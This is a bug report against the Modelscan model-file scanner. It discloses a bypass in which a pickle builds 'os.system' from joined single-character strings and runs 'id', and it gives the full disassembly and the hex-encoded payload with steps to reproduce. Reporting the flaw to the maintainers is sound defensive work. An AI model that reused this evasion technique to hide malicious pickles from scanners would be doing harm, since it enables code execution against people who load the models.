[BUG] Security Vulnerability

[nier0x00]

Describe the bug
Modelscan scanned a malicious pickle file using defaults and reported no issues.

To Reproduce
Steps to reproduce the behavior:
The disassembly of the malicious file looks like this:

    0: \x80 PROTO      4
    2: \x95 FRAME      240
   11: \x8c SHORT_BINUNICODE 'importlib'
   22: \x8c SHORT_BINUNICODE 'import_module'
   37: \x93 STACK_GLOBAL
   38: \x94 MEMOIZE    (as 0)
   39: \x8c SHORT_BINUNICODE 'builtins'
   49: \x85 TUPLE1
   50: R    REDUCE
   51: \x94 MEMOIZE    (as 1)
   52: \x8c SHORT_BINUNICODE 'builtins'
   62: \x8c SHORT_BINUNICODE 'getattr'
   71: \x93 STACK_GLOBAL
   72: \x94 MEMOIZE    (as 2)
   73: h    BINGET     2
   75: h    BINGET     1
   77: \x8c SHORT_BINUNICODE 'str'
   82: \x86 TUPLE2
   83: R    REDUCE
   84: \x8c SHORT_BINUNICODE 'join'
   90: \x86 TUPLE2
   91: R    REDUCE
   92: \x8c SHORT_BINUNICODE ''
   94: ]    EMPTY_LIST
   95: (    MARK
   96: \x8c     SHORT_BINUNICODE 'o'
   99: \x8c     SHORT_BINUNICODE 's'
  102: e        APPENDS    (MARK at 95)
  103: \x86 TUPLE2
  104: R    REDUCE
  105: \x94 MEMOIZE    (as 3)
  106: h    BINGET     2
  108: h    BINGET     2
  110: h    BINGET     1
  112: \x8c SHORT_BINUNICODE 'str'
  117: \x86 TUPLE2
  118: R    REDUCE
  119: \x8c SHORT_BINUNICODE 'join'
  125: \x86 TUPLE2
  126: R    REDUCE
  127: \x8c SHORT_BINUNICODE ''
  129: ]    EMPTY_LIST
  130: (    MARK
  131: \x8c     SHORT_BINUNICODE 's'
  134: \x8c     SHORT_BINUNICODE 'y'
  137: \x8c     SHORT_BINUNICODE 's'
  140: \x8c     SHORT_BINUNICODE 't'
  143: \x8c     SHORT_BINUNICODE 'e'
  146: \x8c     SHORT_BINUNICODE 'm'
  149: e        APPENDS    (MARK at 130)
  150: \x86 TUPLE2
  151: R    REDUCE
  152: \x94 MEMOIZE    (as 4)
  153: h    BINGET     2
  155: h    BINGET     2
  157: h    BINGET     1
  159: \x8c SHORT_BINUNICODE 'str'
  164: \x86 TUPLE2
  165: R    REDUCE
  166: \x8c SHORT_BINUNICODE 'join'
  172: \x86 TUPLE2
  173: R    REDUCE
  174: \x8c SHORT_BINUNICODE ''
  176: ]    EMPTY_LIST
  177: (    MARK
  178: \x8c     SHORT_BINUNICODE 'i'
  181: \x8c     SHORT_BINUNICODE 'd'
  184: e        APPENDS    (MARK at 177)
  185: \x86 TUPLE2
  186: R    REDUCE
  187: \x94 MEMOIZE    (as 5)
  188: h    BINGET     2
  190: h    BINGET     1
  192: \x8c SHORT_BINUNICODE 'getattr'
  201: \x86 TUPLE2
  202: R    REDUCE
  203: \x8c SHORT_BINUNICODE 'builtins'
  213: \x8c SHORT_BINUNICODE '__import__'
  225: \x93 STACK_GLOBAL
  226: \x94 MEMOIZE    (as 6)
  227: \x94 MEMOIZE    (as 7)
  228: h    BINGET     3
  230: \x85 TUPLE1
  231: R    REDUCE
  232: h    BINGET     4
  234: \x86 TUPLE2
  235: R    REDUCE
  236: h    BINGET     5
  238: \x85 TUPLE1
  239: R    REDUCE
  240: \x94 MEMOIZE    (as 8)
  241: \x8c SHORT_BINUNICODE 'gottem'
  249: \x94 MEMOIZE    (as 9)
  250: b    BUILD
  251: .    STOP

1. Run echo "800495f0000000000000008c09696d706f72746c69628c0d696d706f72745f6d6f64756c6593948c086275696c74696e738552948c086275696c74696e738c07676574617474729394680268018c0373747286528c046a6f696e86528c005d288c016f8c0173658652946802680268018c0373747286528c046a6f696e86528c005d288c01738c01798c01738c01748c01658c016d658652946802680268018c0373747286528c046a6f696e86528c005d288c01698c016465865294680268018c076765746174747286528c086275696c74696e738c0a5f5f696d706f72745f5f939494680385526804865268058552948c06676f7474656d94622e" | xxd -r > str_concat_bypass.pkl
2. Run python3 -m pickle str_concat_bypass.pkl and the output for the id command should be displayed in stdout.
3. Run modelscan -p str_concat_bypass.pkl to see that no issues were found

Expected behavior
Modelscan reports the following on this file:

--- Summary ---

Total Issues: 2

Total Issues By Severity:

    - LOW: 0
    - MEDIUM: 0
    - HIGH: 0
    - CRITICAL: 2

--- Issues by Severity ---

--- CRITICAL ---

Unsafe operator found:
  - Severity: CRITICAL
  - Description: Use of unsafe operator '__import__' from module 'builtins'
  - Source: <path>/string_concat_bypass.pkl

Unsafe operator found:
  - Severity: CRITICAL
  - Description: Use of unsafe operator 'getattr' from module 'builtins'
  - Source: <path>/string_concat_bypass.pkl

However, os.system('id') is not caught since this string is split up before it's merged using str.join

Environment (please complete the following information):

• OS: Debian Linux
• Modelscan Version 0.8.7